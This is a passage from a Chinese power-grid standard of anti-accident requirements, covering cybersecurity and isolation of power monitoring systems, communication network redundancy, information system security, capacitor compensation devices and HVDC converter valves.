调度端及厂站端应配备全站统一的卫星时钟设备和网络授时设备, 对站内各种系统和设备的时钟进行统一校正。主时钟应采用双机双时钟源(北斗 和GPS)冗余配置。时间同步装置应能可靠应对时钟异常跳变及电磁干扰等情况, 避免时钟源切换策略不合理等导致输出时间的连续性和准确性受到影响。被授时 系统(设备)对接收到的对时信息应做校验。 176 19.2 防止电力监控系统网络安全事故 19.2.1 电力监控系统(或电力二次系统,包括继电保护和安自装置、各类 自动化系统、电力通信系统等)安全防护满足《中华人民共和国网络安全法》、 《电力监控系统安全防护规定》(国家发展改革委令2014年第14号)、《电力监 控系统网络安全防护导则》(GB/T36572)等有关要求,建立健全网络安全防护 体系(包括安全防护技术、应急备用措施、全面安全管理、不断发展完善),坚 持“安全分区、网络专用、横向隔离、纵向认证”结构安全基本原则,落实网络 安全防护措施与电力监控系统同步规划、同步建设、同步使用要求,确保电力监 控系统安全防护体系完整可靠,具有数据网络安全防护实施方案和网络安全隔离 措施,分区合理、隔离措施完备、可靠,提高电力监控系统安全防护水平。禁止 通过外部公共信息网直接对场站内设备进行远程控制和维护。 19.2.2 电力监控系统安全防护策略从边界防护逐步过渡到全过程安全防护, 禁止选用经国家相关管理部门检测存在信息安全漏洞的设备,信息系统安全保护 等级为安全四级的主要设备应满足电磁屏蔽的要求,全面形成具有纵深防御的安 全防护体系。 19.2.3 生产控制大区内部的系统配置应符合规定要求,硬件应满足要求;生 产控制大区一和二区之间应实现逻辑隔离,访问控制规则(ACL)应按最小化原 则进行配置;连接生产控制大区和管理信息大区间应安装单向横向隔离装置;发 电厂至上一级调度机构电力调度数据网之间应安装纵向加密认证装置,以上两装 置应经过国家权威机构的测试和安全认证。 19.2.4 调度主站、变电站、统调发电厂生产控制大区的业务系统与终端的纵 向通信应优先采用OPGW光纤通信的电力调度数据网等专用数据网络,并采取有 效的防护措施;使用无线通信网或非电力调度数据网进行通信的,应设立安全接 入区,并采用安全隔离、访问控制、安全认证及数据加密等安全措施。配电网自 动化、用电负荷控制、风电场和光伏电站内部控制等业务可以采用无线通信方式, 但必须采用网络安全防护措施,防止系统末梢的无线通信直接联入电力控制专用 网络。 19.2.5 调度主站具有远方控制功能(如系统保护、精准切负荷等)的业务应 采用人员、设备和程序的身份认证,具备数据加密等安全技术措施。 177 19.2.6 地级及以上调度机构应建设网络安全管理平台或网络安全态势感知 系统,调管厂站侧应部署网络安全监测装置或网络安全态势感知采集装置,实现 对调度控制系统、变电站监控系统、发电厂涉网监控系统网络安全事件的监视、 告警、分析和审计功能。应建立配电自动化系统、负荷控制系统等其他电力监控 系统及其终端的网络安全事件的监测和管理技术手段,并将重要告警信息及时传 送至调度机构网络安全管理平台或网络安全态势感知系统。 19.2.7 火电厂分散控制系统与管理信息大区之间必须设置经国家指定部门 检测认证的电力专用横向单向安全隔离装置。分散控制系统与生产控制大区其他 业务之间至少应采用具有访问控制功能的设备、防火墙或者相当功能的设施,实 现逻辑隔离。分散控制系统禁止采用安全风险高的通用网络服务功能。分散控制 系统的重要业务系统内部通信应采用加密认证机制。 19.2.8 调度主站、变电站、发电厂电力监控系统工程建设和管理单位(部门) 应严格按照安全防护要求,保障横向隔离、纵向认证、调度数字证书、网络安全 监测等安全防护技术措施与电力监控系统同步建设,根据要求配置安全防护策 略,验收合格方可开展业务调试。 19.2.9 变电站、发电厂电力监控系统安全防护实施方案应经过相应调度机构 的审核,方案实施完成后应通过相应调度机构参与的验收。 19.2.10 调度主站、变电站、发电厂电力监控系统工程建设和管理单位(部 门)应按照最小化原则,采取白名单方式对安全防护设备的策略进行合理配置。 电力监控系统各类主机、网络设备、安防设备、操作系统、应用系统、数据库等 应采用强口令,并删除缺省账户。应按照要求对电力监控系统主机及网络设备进 行安全加固,关闭空闲的硬件端口,关闭生产控制大区禁用的通用网络服务。 19.2.11 调度主站、变电站、发电厂电力监控系统在设备选型及配置时,应 使用国家指定部门检测认证的安全加固的操作系统和数据库,禁止选用经国家相 关管理部门检测认定并通报存在漏洞和风险的系统和设备。生产控制大区中除安 全接入区外,应禁止选用具有无线通信功能的设备。调度主站、变电站、发电厂 生产控制大区各业务系统的调试工作,须采用经安全加固的便携式计算机及移动 介质,严格按照调度分配的安全策略和网络资源实施;禁止违规连接互联网或跨 安全大区直连。应加强现场作业人员的作业管控,禁止将未经病毒查杀的移动介 178 质接入生产系统。 19.2.12 调度主站、变电站、发电厂电力监控系统在上线投运之前、升级改 造之后应进行安全评估,不符合安全防护规定或存在严重漏洞的禁止投入运行。 对于等级保护三级及以上系统和电力行业关键信息基础设施,系统上线前应聘请 具备测评资质的机构开展等级保护测评,测评通过后方可允许并网。对于等级保 护三级及以上系统和电力行业关键信息基础设施,应同步开展商用密码应用安全 性评估工作。 19.2.13 严格控制生产控制大区局域网络的延伸,严格控制异地使用键盘、 显示器、鼠标(KVM)功能,确需使用的应制定详细的网络安全防护方案并经 主管部门审核。 19.2.14 调度主站、发电厂电力监控系统应在投入运行后30日内办理等级保 护备案手续。已投入运行的电力监控系统,应按照相关要求定期开展等级保护测 评及安全防护评估工作。针对测评、评估发现的问题,应及时完成整改。 19.2.15 调度主站、变电站、发电厂记录电力监控系统网络运行状态、网络 安全事件的日志应保存不少于六个月。应对用户登录本地操作系统、访问系统资 源等操作进行身份认证,根据身份与权限进行访问控制,并且对操作行为进行安 全审计。应建立责权匹配的用户权限划分机制,落实用户实名制和身份认证措施。 严格限制生产控制大区拨号访问和远程运维。 19.2.16 调度主站、发电厂应对病毒库、木马库以及入侵检测系统(IDS) 规则库更新至六个月内最新版本,在生产控制大区,病毒库、木马库经事先测试 对业务系统无影响后进行。 19.2.17 调度主站、变电站、发电厂应重点加强内部人员的保密教育、录用 离岗等的管理,并定期组织安全防护专业人员技术培训。应对厂家现场服务人员 进行网络安全教育,签订安全承诺书,严格控制其工作范围和操作权限。 19.2.18 调度主站应加强并网发电企业涉网安全防护的技术监督。禁止各类 发电厂生产控制大区任何形式的非法外联,禁止主机设备跨安全区直连,严禁设 备厂商或其他服务企业远程进行电力监控系统的控制、调节和运维操作,完善并 网发电企业涉网网络安全分区分域体系架构,增强新能源等并网发电企业涉网部 分物理安全防护和网络准入,严禁远程集控采用非安全通信方式,严禁将与调度 179 机构通信的远动装置用于给非调度机构的其他单位转发数据。 19.2.19 电力监控系统的运维单位(部门)应制定和落实电力监控系统应急 预案和故障恢复措施,并定期演练。应定期对关键业务的数据与系统进行备份, 建立历史归档数据的异地存放制度。 19.2.20 当电力监控系统遭受网络攻击,发生危害网络安全的事件时,运维 单位(部门)应按照应急预案,立即采取处置措施,并向上级调度机构以及主管 部门报告。对电力监控系统安全事件紧急及重要告警应立即处置,对发现的漏洞 和风险应限期整改。 19.2.21 调度主站、变电站、发电厂应配置运维网关(堡垒机)、专用安全 U盘、专用运维终端等运维装备,在监控后台等重要主机具备U盘监视功能,拆 除或禁用不必要的光驱、USB接口、串行口等,严格管控移动介质接入生产控制 大区。 19.2.22 调度主站应逐步采用基于可信计算的安全免疫防护技术,形成对病 毒木马等恶意代码的自动免疫。重要电力监控系统和设备应逐步推广应用以密码 硬件为核心的可信计算技术,用于实现计算环境和网络环境安全免疫,免疫未知 恶意代码,防范有组织的、高级别的恶意攻击。严禁重要电力控制系统现场修改 程序代码,程序代码修改后必须经过专业检测和真型动态模拟测试,且通过安全 可信封装保护和安全可信度量,并在备用设备上实测无误后,方可投入在线运行。 19.2.23 应将网络安全管理融入电力安全生产管理体系,对全体人员(包括 内部人员和外部调试或测试人员)、全部设备(包括安全设备和生产设备等)、 全生命周期进行全方位的安全管理。电力监控系统的设计研发、安装调试、运行 维护和退役销毁的全生命周期,采集、传输和控制等各环节均应严格考虑安全防 护技术。 19.2.24 电力监控系统可采用控制专用云技术,但必须与社会公有云及企业 管理云实施安全隔离;可采用控制专用物联网技术,但必须与社会公有物联网及 企业管理物联网实施安全隔离。 19.3 防止电力通信网事故 19.3.1 电力通信网的网络规划、设计和改造计划应与电力发展相适应,并保 持适度超前,统筹业务布局和运行方式优化,充分满足各类业务应用需求,避免 180 生产控制类业务过度集中承载,强化通信网薄弱环节的改造力度,力求网络结构 合理、运行灵活、坚强可靠和协调发展。 19.3.2 通信设备选型应与现有网络使用的设备类型一致,保持网络完整性。 承载110kV及以上电压等级输电线路生产控制类业务的光传输设备应支持双电 源供电,核心板卡应满足冗余配置要求。220kV及以上新建输变电工程应同步设 计、建设线路本体光缆。 19.3.3 电力新建、改(扩)建等工程需对原有通信系统的网络结构、安装位 置、设备配置、技术参数进行改变时,工程建设单位应委托设计单位对通信系统 进行设计,深度应达到初步设计要求,经相关电力通信管理部门同意后,按照电 力新建、改(扩)建工程建设程序开展相关工作。现场设备的接口和协议应满足 通信系统的要求。必要时应根据实际情况制定通信系统过渡方案。 19.3.4 电力调度机构、集控中心(站)、220kV及以上电压等级厂站和通信 枢纽站应具备两条及以上完全独立的光缆敷设沟道(竖井)。同一方向的多条光 缆或同一传输系统不同方向的多条光缆应避免同路由敷设进入通信机房和主控 室。 19.3.5 省级及以上电力调度机构应具备三条及以上全程不同路由的出局光 缆接入骨干通信网。省级及以上电力备用调度机构、地(市)级调度机构应具备 两条及以上全程不同路由的出局光缆接入骨干通信网。 19.3.6 通信光缆或电缆应避免与一次动力电缆同沟(架)布放,并完善防火 阻燃和阻火分隔等各项安全措施,绑扎醒目的识别标志;如不具备条件,应采取 电缆沟(竖井)内部分隔离等措施进行有效隔离。新建通信站应在设计时与全站 电缆沟(架)统一规划,满足以上要求。 19.3.7 电力调度机构与直调发电厂及重要变电站调度自动化实时业务信息 的传输应具有两路不同路由的通信通道(主/备双通道)。调度厂站应具有两种 及以上通信方式的调度电话,满足“双设备、双路由、双电源”的要求,且至少保 证有一路单机电话。省调及以上调度及许可厂站应至少具备一种光纤通信手段。 19.3.8 同一条220kV及以上电压等级线路的两套继电保护通道、同一系统的 有主/备关系的两套安全自动装置通道应至少采用两条完全独立的路由;均采用 复用通道的,应由两套独立的通信传输设备分别提供,且传输设备均应由两套电 181 源供电,满足“双设备、双路由、双电源”的要求。 19.3.9 双重化配置的继电保护、安全自动控制光电转换接口装置的直流电源 应取自不同的电源。单电源供电的继电保护接口装置和为其提供通道的单电源供 电通信设备,如外置光放大器、脉冲编码调制设备(PCM)、载波设备等,应 由同一套电源供电。 19.3.10 在配置双套通信直流供电系统(含通信高频开关电源和通信用直流 变换电源系统)的厂站,具备双电源接入功能的通信设备应由两套电源独立供电。 禁止两套电源负载侧形成并联。 19.3.11 电力调度机构、330kV及以上电压等级变电站、通信枢纽站应配备 两套独立的通信高频开关电源。每套通信高频开关电源应有两路分别取自不同母 线的交流输入,并具备相互独立的自动切换功能。通信高频开关电源每个整流模 块交流输入侧应加装独立的断路器。 19.3.12 每套通信直流供电系统的整流或变换模块配置总数量不应少于3块。 通信站蓄电池组供电后备时间不少于4小时,地处偏远的无人值班通信站应大于 抢修人员携带必要工器具抵达通信站的时间且不小于8小时。 19.3.13 电力调度机构、330kV及以上电压等级变电站、通信枢纽站的通信 机房,应配备不少于两套具备独立控制和来电自启功能的专用机房空调,在空调 “N-1”情况下机房温度、湿度应满足设备运行要求,且空调电源不应取自同一路 交流母线。空调送风口不应处于机柜正上方。 19.3.14 通信高频开关电源与机房空调不应共用机房交流配电屏。电源监控 系统应采用站内通信直流供电系统、UPS等具备后备时间的供电方式。 19.3.15 通信机房、通信设备(含电源设备)的防雷和过电压防护能力应满 足电力系统通信站防雷和过电压防护相关标准、规定的要求。 19.3.16 跨越高速铁路、高速公路和重要输电通道(“三跨”)的架空输电线 路区段光缆不应使用全介质自承式光缆(ADSS),宜选用全铝包钢结构的光纤 复合架空地线(OPGW)。 19.3.17 电力一次系统配套通信项目应随电力一次系统建设同步设计、同步 实施、同步投运,以满足电力发展需要。 19.3.18 通信设备应在安装、调试、入网试验等各个阶段严格执行电力系统 182 通信运行管理和工程建设、验收等方面的标准、规定。 19.3.19 应从保证工程质量和通信设备安全稳定运行的要求出发,合理安排 新建、改建和技改工程的工期,严格把好质量关,满足提前调试的条件,不得因 赶工期减少调试项目,降低调试质量。 19.3.20 用于传输继电保护和安全自动装置业务的通信通道投运前应进行测 试验收,其传输时延、误码率、倒换时间等技术指标应满足《继电保护和安全自 (GB/T 14285)和《光纤通道传输保护信息通用技术条件》 动装置技术规程》 (DL/T 364)的要求。传输线路电流差动保护的通信通道应满足收、发路径和时延相同 的要求。 19.3.21 通信高频开关电源系统投运前应进行双交流输入切换试验、电源系 统告警信号的校核验证。通信蓄电池组投运前应进行全核对性放电试验。通信设 备投运前应进行双电源倒换测试。 19.3.22 安装调试人员应严格按照通信业务运行方式单的内容进行设备配置 和接线。通信调度应在业务开通前与现场工作人员核对通信业务运行方式单的相 关内容,确保业务图实相符。 19.3.23 严格按照OPGW及其他光缆施工工艺要求进行施工。OPGW光缆应 在进站门型架顶端、最下端固定点(余缆前)和光缆末端分别通过匹配的专用接 地线可靠接地,其余部分应与构架绝缘。采用分段绝缘方式架设的输电线路 OPGW光缆,绝缘段接续塔引下的OPGW光缆与构架之间的最小绝缘距离应满足 安全运行要求,接地点应与构架可靠连接。 19.3.24 OPGW、ADSS等光缆在进站门型架处应悬挂醒目光缆标识牌。应防 止引入光缆封堵不严或接续盒安装不正确,造成光缆保护管内或接续盒内进水结 冰,导致光纤受力引起断纤故障的发生。引入光缆应采用阻燃、防水功能的非金 属光缆,并在沟道内全程穿防护子管或使用防火槽盒。引入光缆从门型架至电缆 沟地埋部分应全程穿热镀锌钢管,钢管应全程密闭并与站内接地网可靠连接,钢 管埋设路径上应设置地埋光缆标识或标牌,钢管地面部分应与构架固定。 19.3.25 直埋光缆(通信电缆)在地面应设置清晰醒目的标识。承载继电保 护、安全自动装置业务的专用通信线缆、配线端口等应采用醒目颜色的标识。 19.3.26 通信设备应采用独立的断路器或直流熔断器供电,禁止并接使用。 183 各级断路器或熔断器保护范围应逐级配合,下级不应大于其对应的上级断路器或 熔断器的额定容量,避免出现越级跳闸,导致故障范围扩大。 19.3.27 通信机房应满足密闭防尘和温度、湿度要求,不宜安装窗户,若有 窗户应具备遮阳功能,防止阳光直射机柜和设备。 19.3.28 各级通信调度负责监视及控制所辖范围内通信网的运行情况,指挥、 协调通信网故障处理。通信调度员应具有较强的判断、分析、沟通、协调和管理 能力,熟悉所辖通信网络状况和业务运行方式,上岗前应进行培训和考核。 19.3.29 通信站内主要设备及机房动力环境的告警信号应上传至24小时有人 值班的场所。通信电源系统及为通信设备供电的其他电源系统的状态及告警信息 应纳入实时监控,满足通信运行要求。 19.3.30 通信蓄电池组核对性放电试验周期不得超过两年,运行年限超过四 年的蓄电池组,应每年进行一次全核对性放电试验。蓄电池单体浮充电压应严格 按照电源运行规程设定,避免造成蓄电池欠充或过充。 19.3.31 通信直流供电系统新增负载时,应及时核算电源及蓄电池组容量, 如不满足安全运行要求,应对电源实施改造或调整负载。每年春、秋检期间应对 电源系统进行负荷校验、主备切换试验、告警信息验证。 19.3.32 连接两套通信直流供电系统的直流母联断路器应采用手动切换方 式。通信直流供电系统正常运行时,禁止闭合直流母联断路器。 19.3.33 通信检修工作应严格遵守电力通信检修管理规定相关要求,对通信 检修票的业务影响范围、采取的措施等内容应严格审查核对,对影响一次电力生 产业务的检修工作应按一次电力检修管理办法办理相关手续。严格按照通信检修 票工作内容开展工作,严禁超范围、超时间检修。 19.3.34 通信运行部门应与电力一次线路建设、运维及市政施工部门建立沟 通协调机制,避免因电力建设、检修或市政施工对光缆运行造成影响。对可能影 响电力通信光缆正常运行的城市施工,电力通信运行部门应提前告知建设单位电 力通信光缆的保护要求,现场确认防止光缆中断的措施落实情况,并告知光缆受 损或中断后采取的措施。项目建设单位应配合做好电力通信光缆的保护和应急处 置。 19.3.35 通信运行部门应与一次线路建设、运行维护部门建立工作联系制度。 184 因一次线路施工或检修对通信光缆造成影响时,一次线路建设、运行维护部门应 提前通知通信运行部门,并按照电力通信检修管理规定办理相关手续,如影响上 级通信电路,应报上级通信调度审批后,方可批准办理开工手续。防止人为原因 造成通信光缆非计划中断。 19.3.36 检修施工单位需要同时办理电力和通信检修申请时,应在得到电力 调度和通信调度“双许可”后,方可开展检修工作。 19.3.37 线路运行维护部门应结合线路巡检每半年对OPGW光缆进行专项检 查,并将检查结果报通信运行部门。通信运行部门应每半年对ADSS和普通光缆 进行专项检查,重点检查站内及线路光缆的外观、接续盒固定线夹、接续盒密封 垫等,并对光缆备用纤芯的衰耗特性进行测试对比。 19.3.38 每年雷雨季节前应对接地系统进行检查和维护。检查连接处是否紧 固、接触是否良好、接地引下线有无锈蚀、接地体附近地面有无异常,必要时应 开挖地面抽查地下隐蔽部分锈蚀情况。独立通信站、综合大楼接地网的接地电阻 应每年进行一次测量,变电站通信接地网应纳入变电站接地网测量内容和周期。 微波塔上除架设本站必须的通信装置外,不得架设或搭挂可构成雷击威胁的其他 装置。 19.3.39 加强通信设备、网管系统运行管理,落实数据备份、病毒防范和网 络安全防护要求。通信网管应定期开展网络安全等级保护定级备案和测评工作, 及时整改测评中发现的安全隐患。 19.3.40 应定期开展机房和设备除尘工作。每季度应对通信设备的滤网、防 尘罩等进行清洗,做好设备防尘、防虫工作。 19.3.41 通信设备检修或故障处理中,应严格按照通信设备和仪表使用手册 进行操作,避免误操作或对通信设备及人员造成损伤。在采用光时域反射仪测试 光纤时,应断开对端通信设备;在插拔拉曼放大器尾纤时,应先关闭泵浦激光器。 19.3.42 调度交换机运行数据应每月进行备份,当系统数据变动时,应及时 备份。调度录音系统应每周进行检查,确保运行可靠、录音效果良好、录音数据 准确无误、存储容量充足。调度录音系统服务器应保持时间同步。 19.3.43 因通信设备故障、施工改造或电路优化工作等原因,需要对原有通 信业务运行方式进行调整时,如在48小时之内不能恢复原运行方式,应编制和下 185 达新的通信业务运行方式单。 19.3.44 落实通信专业在电网大面积停电及突发事件发生时的组织机构和技 术保障措施;完善各类通信设备和系统的现场处置方案和应急预案,定期开展反 事故演习,检验应急预案的有效性,提高通信网预防和应对突发事件的能力。 19.3.45 架设有通信光缆的一次线路计划退运前,应通知相关通信运行管理 部门,并根据业务需要制订改造调整方案,确保通信系统可靠运行。 19.4 防止信息系统事故 19.4.1 信息系统的需求阶段应充分考虑到信息安全,进行风险分析,开展等 级保护定级工作;设计阶段应明确系统自身安全功能一设计以及安全防护部署设 计,形成专项信息安全防护设计。 19.4.2 加强信息系统开发阶段的管理,建立完善内部安全测试机制,确保项 目开发人员遵循信息安全管理和信息保密要求,并加强对项目开发环境的安全管 控,确保开发环境与实际运行环境安全隔离。 19.4.3 建立并完善信息系统安全管理机构,强化管理确保各项安全措施落实 到位。 19.4.4 定期开展风险评估,并通过质量控制及应急措施消除或降低评估工作 中可能存在的风险。 19.4.5 在技术上合理配置和设置物理环境、网络、主机系统、应用系统、数 据等方面的设备及安全措施;在管理上不断完善规章制度,持续改善安全保障机 制。 19.4.5.1 信息网络设备及其系统设备可靠,符合相关要求;总体安全策略、 设备安全策略、网络安全策略、应用系统安全策略、部门安全策略等应正确,符 合规定。 19.4.5.2 构建网络基础设备和软件系统安全可信,没有预留后门或逻辑炸 弹。接入网络用户及网络上传输、处理、存储的数据可信,杜绝非授权访问或恶 意篡改。 19.4.5.3 路由器、交换机、服务器、邮件系统、目录系统、数据库、域名系 统、安全设备、密码设备、密钥参数、交换机端口、IP地址、用户帐号、服务端 口等网络资源统一管理。 186 19.4.6 信息系统上线前测试阶段,应严格进行安全功能测试、代码安全检测 等内容;并按照合同约定及时进行软件著作权资料的移交。 19.4.7 通过灾备系统的实施做好信息系统及数据的备份,以应对自然灾难可 能会对信息系统造成毁灭性的破坏。网络节点具有备份恢复能力,并能够有效防 范病毒和黑客的攻击所引起的网络拥塞、系统崩溃和数据丢失。 19.4.8 信息系统投入运行前,应对访问策略和操作权限进行全面清理,复查 账号权限,核实安全设备开放的端口和策略,确保信息系统投运后的信息安全; 信息系统投入运行须同步纳入监控。 19.4.9 在信息系统运行维护、数据交互和调试期间,认真履行相关流程和审 批制度,执行工作票和操作票制度,不得擅自进行在线调试和修改,相关维护操 作在测试环境通过后再部署到正式环境。 19.4.10 配备信息安全管理人员,并开展有效的管理、考核、审查与培训。 19.4.11 加强网络与信息系统安全审计工作,安全审计系统要定期生成审计 报表,审计记录应受到保护,并进行备份,避免删除、修改或破坏。 20 防止串联电容器补偿装置和并联电容器装置事故的重点要求 20.1 防止串联电容器补偿装置事故 20.1.1 应考虑串补装置接入后对差动保护、距离保护、重合闸等继电保护功 能的影响。并应避免出现系统感性电抗小于串补容性电抗等继电保护无法适应的 串补接入方式。 20.1.2 当电源送出系统装设串补装置时, 应进行串补装置接入对发电机组 次同步振荡的影响分析,当存在次同步振荡风险时, 应确定抑制次同步振荡的 措施。 20.1.3 应通过对电力系统区内外故障、暂态过载、短时过载和持续运行等顺 序事件进行校核,以验证串补装置的耐受能力。 20.1.4 电容器组 20.1.4.1 串联电容器应采用双套管结构。 20.1.4.2 串联电容器绝缘介质的平均电场强度不应高于57kV/mm。 20.1.4.3 单只电容器的耐爆容量应不小于 18kJ ,电容器的并联数量应考虑 187 电容器的耐爆能力。 20.1.4.4 电容器之间的连接线应采用软连接。 20.1.4.5 电容器组初始不平衡电流应不大于电容器组不平衡电流告警值的 30%。 20.1.4.6 运行中应重点关注电容器组不平衡电流值,当确认该值发生越限告 警时,应在一周内安排串补装置检修。 20.1.5 金属氧化物限压器(MOV) 20.1.5.1 MOV的能耗计算应考虑系统发生区内和区外故障(包括单相接地故 障、两相短路故障、两相接地故障和三相接地故障)以及故障后线路摇摆电流流 过金属氧化物限压器过程中积累的能量,还应计及线路保护的动作时间与重合闸 时间对金属氧化物限压器能量积累的影响。 20.1.5.2 新建串补装置的MOV热备用容量裕度应大于10%且不少于3单元/ 平台。 20.1.5.3 新建串补装置的MOV应采用复合外套。 20.1.6 阻尼装置 20.1.6.1 线路短路故障导致串补跳闸后,应检查故障相电容器高频放电电流 频率和衰减速度,若放电电流频率超出设计值,应考虑阻尼装置损坏,尽快安排 串补装置检修。 20.1.7 火花间隙 20.1.7.1 火花间隙的强迫触发电压应不高于1.8p.u.,无强迫触发命令时拉合 串补装置相关隔离开关不应出现间隙误触发。 20.1.7.2 火花间隙动作次数超过厂家规定值时进行检查。若动作次数长期未 超过厂家规定值,运行单位应根据线路及串补运行情况定期进行检查。检查项目 应包括间隙距离检查、表面清洁及触发回路功能试验。 20.1.7.3 应检查串补装置保护触发火花间隙功能,验证间隙能可靠击穿。 20.1.8 电流互感器和平台取能设备 20.1.8.1 串补装置平台上控制保护设备电源应能在激光电源供电、平台取能 设备供电之间平滑切换。对于单一激光回路供能设备,激光供能回路应冗余配置, 其中一回供能回路出现问题应不影响设备正常运行。线路故障时,串补装置平台 188 上的控制保护设备的供电应不受影响。 20.1.9 光纤柱 20.1.9.1 光纤柱中包含的信号光纤和激光供能光纤不应采用光纤转接设备, 并应有100%的备用芯数量。 20.1.9.2 串补装置平台到控制保护室的光纤损耗不应超过3dB。 20.1.10 串补平台抗干扰措施 20.1.10.1 串补装置平台上测量及控制箱的箱体应采用密闭良好的金属壳 体,箱门四边金属应与箱体可靠接触,避免外部电磁干扰辐射进入箱体内。 20.1.10.2 串补装置平台上各种电缆应采取有效的一、二次设备间的隔离和 防护措施,如电磁式电流互感器电缆应外穿与串补装置平台及所连接设备外壳可 靠连接的金属屏蔽管;电缆头制作工艺应符合要求;应尽量减少电缆长度;串补 装置平台上采用的电缆绝缘强度应高于控制室内控制保护设备采用的电缆强度; 接入串补装置平台上测量及控制箱的电缆应增加防扰措施。 20.1.11 控制保护系统 20.1.11.1 控制保护系统应采取必要的电磁干扰防护措施,串补装置平台上 的控制保护设备所采用的电磁干扰防护能力应高于控制室内的控制保护设备。控 制及保护设备应就地与等电位接地网可靠连接。 20.1.11.2 在线路保护跳闸经长电缆联跳旁路断路器的回路中,应在串补装 置控制保护开入量前一级采取防止直流接地或交直流混线时引起串补控制保护 开入量误动作的措施。 20.1.11.3 在串补装置遇到区内外故障或拉合串补相关隔离开关时,串补装 置控制保护不应出现误动作或误发告警的情况。 20.1.11.4 串补装置的保护应完全双重化配置。 20.1.12 串补运行方式操作 20.1.12.1 串补装置停电检修时运行人员应将二次操作电源断开,将相关联 跳线路保护的连接片断开。 20.2 防止高压并联电容器装置事故 20.2.1 高压并联电容器 20.2.1.1 加强高压并联电容器工作场强控制,在压紧系数为1(即 K=1)条件 189 下,全膜电容器绝缘介质的平均场强不得大于57kV/mm。 20.2.1.2 电 容 器 组 每 相 每 一 并 联 段 并 联 总 容 量 不 大 于 3900kVar ( 包 括 3900kVar);单台电容器耐爆容量不低于15kJ。 20.2.1.3 电容器单元选型时应采用内熔丝结构,电容器组禁止采用外熔断器 和内熔丝保护混用。 20.2.1.4 高压直流输电系统用交流并联电容器及交流滤波电容器在设计环 节应有防鸟害措施。 20.2.1.5 电容器端子间或端子与汇流母线间的连接应采用带绝缘护套的软 铜线。 20.2.1.6 新安装电容器的汇流母线宜采用铜排。 20.2.1.7 同一型号产品必须提供满足国标覆盖要求的老化试验报告。对每一 批次产品,制造厂需提供能覆盖此批次产品的老化性试验报告。 20.2.1.8 加强电容器设备的交接验收工作 20.2.1.8.1 电容器例行停电试验时要求定期进行电容器组单台电容器电容量 的测量,应使用不拆连接线的测量方法。对于内熔丝电容器,当电容量减少超过 铭牌标注电容量的3%时,应退出运行,避免电容器带故障运行而发展成扩大性 故障。对于无内熔丝的电容器,一旦发现电容量增大超过一个串段击穿所引起的 电容量增大,应立即退出运行,避免电容器带故障运行而发展成扩大性故障。 20.2.1.9 采用自动电压控制(AVC)等自动投切系统控制的多组电容器投切 策略应保持各组投切次数均衡,避免反复投切同一组,而其他组长时间闲置。近 1个年度内投切次数达到1000次时,自动投切系统应闭锁投切。对投切次数达到 1000次的电容器组连同其断路器均应及时进行例行检查及试验,确认设备状态完 好后应及时解锁。 20.2.2 外熔断器 20.2.2.1 安装五年以上的外熔断器应及时更换。 20.2.3 串联电抗器 20.2.3.1 电抗器的电抗率应根据并联电容器装置接入电网处的背景谐波含 量的测量值选择,必须避免同谐波发生谐振或谐波过度放大,运行中谐波电流应 不超过标准要求。已配置抑制谐波用串联电抗器的电容器组,禁止减容量运行。 190 20.2.3.2 35kV及以下户内串联电抗器应选用干式铁心或油浸式电抗器。户外 串联电抗器优先选用干式空心电抗器,当户外现场安装环境受限而无法采用干式 空心电抗器时,应选用油浸式电抗器。 20.2.3.3 新安装干式空心电抗器不应采用叠装结构,避免电抗器单相事故发 展为相间事故。 20.2.3.4 并联电容器用干式串联电抗器应安装电容器组首端,在系统短路电 流大的安装点应校核其动、热稳定性。 20.2.3.5 330kV及以上变电站用干式空心电抗器设备交接时,具备条件时宜 进行匝间耐压试验,试验电压取出厂值的80%。 20.2.3.6 在使用环境温度低于-40℃时,户外安装的串联电抗器应采用油浸铁 心电抗器。 20.2.4 放电线圈 20.2.4.1 放电线圈首末端必须与电容器首末端相连接。 20.2.4.2 新安装放电线圈应采用全密封结构。对已运行的非全密封放电线圈 应加强绝缘监督,发现受潮现象应及时更换。 20.2.5 避雷器 20.2.5.1 电容器组过电压保护用金属氧化物避雷器接线方式应采用星形接 线,中性点直接接地方式。 20.2.5.2 电容器组过电压保护用金属氧化物避雷器应安装在紧靠电容器组 高压侧入口处位置。 20.2.5.3 选用电容器组用金属氧化物避雷器时,应充分考虑其通流容量。避 雷器的2 ms方波通流能力应满足标准中通流容量的要求。 20.2.6 电容器组保护 20.2.6.1 采用电容器成套装置,应要求厂家提供保护计算方法和保护整定 值。 21 防止直流换流站设备损坏和单双极强迫停运事故的重点要求 21.1 防止换流阀损坏事故 21.1.1 加强换流阀及阀控系统设计、制造、安装、投运的全过程管理,明确 191 专责人员及其职责。 21.1.2 对于换流阀及阀控系统,应进行赴厂监造和验收。监造验收工作结束 后,赴厂人员应提交监造报告,并作为设备原始资料分别交建设和运行单位存档。 21.1.3 新建直流工程每个单阀中应具有一定数量的冗余晶闸管。各单阀中的 冗余晶闸管数应不小于12个月运行周期内损坏的晶闸管数期望值的2.5倍,且不 应少于3级晶闸管。 21.1.4 换流阀应采用阻燃材料,并消除火灾在换流阀内蔓延的可能性。阀厅 应安装响应时间快、灵敏度高的火情早期检测报警装置。阀厅火灾报警系统宜投 跳闸,确保阀厅出现火情时能够及时停运直流,并自动停运阀厅空调通风系统。 21.1.5 换流阀安装期间,阀塔内部各水管接头应用力矩扳手紧固,并做好标 记。换流阀及阀冷系统安装完毕后应进行冷却水管道压力试验。 21.1.6 换流阀冷控制保护系统至少应双重化配置。阀冷控制系统应具备手动 切换和系统故障情况下自动切换功能,防止单一元件故障不经系统切换直接跳闸 出口。作用于跳闸的传感器应按照三套独立冗余配置,保护按照“三取二”原则出 口,当一套传感器故障时,采用“二取一”或“二取二”逻辑出口;当两套传感器故 障时,采用“一取一”逻辑出口。当阀冷保护检测到严重泄漏、主水流量过低或者 进阀水温过高时,应自动停运直流系统以防止换流阀损坏。 21.1.7 换流阀内冷系统主泵切换延时引起流量变化时,仍应满足换流阀对水 冷系统最小流量的要求。换流阀内冷系统投运前的调试期间应开展主泵切换试 验。 21.1.8 设计阀外风冷系统时,应充分考虑环境温度、安装位置等因素的影响, 具备足够的冷却裕度。应考虑现场热岛效应,设计最高温度应在气象统计最高温 度的基础上增加3至5℃。 21.1.9 冷却系统管道不允许在换流站阀冷系统安装施工现场切割焊接。现场 安装前及水冷分系统试验后,应充分清洗直至换流阀冷却水满足水质要求。 21.1.10 阀控系统应实现完全冗余配置,除光发射板、光接收板和背板外, 其它板卡应能够在换流阀不停运的情况下进行故障处理。阀控系统应全程参与直 流控制保护系统联调试验。当直流控制系统接收到阀控系统的跳闸命令后,应先 进行系统切换。 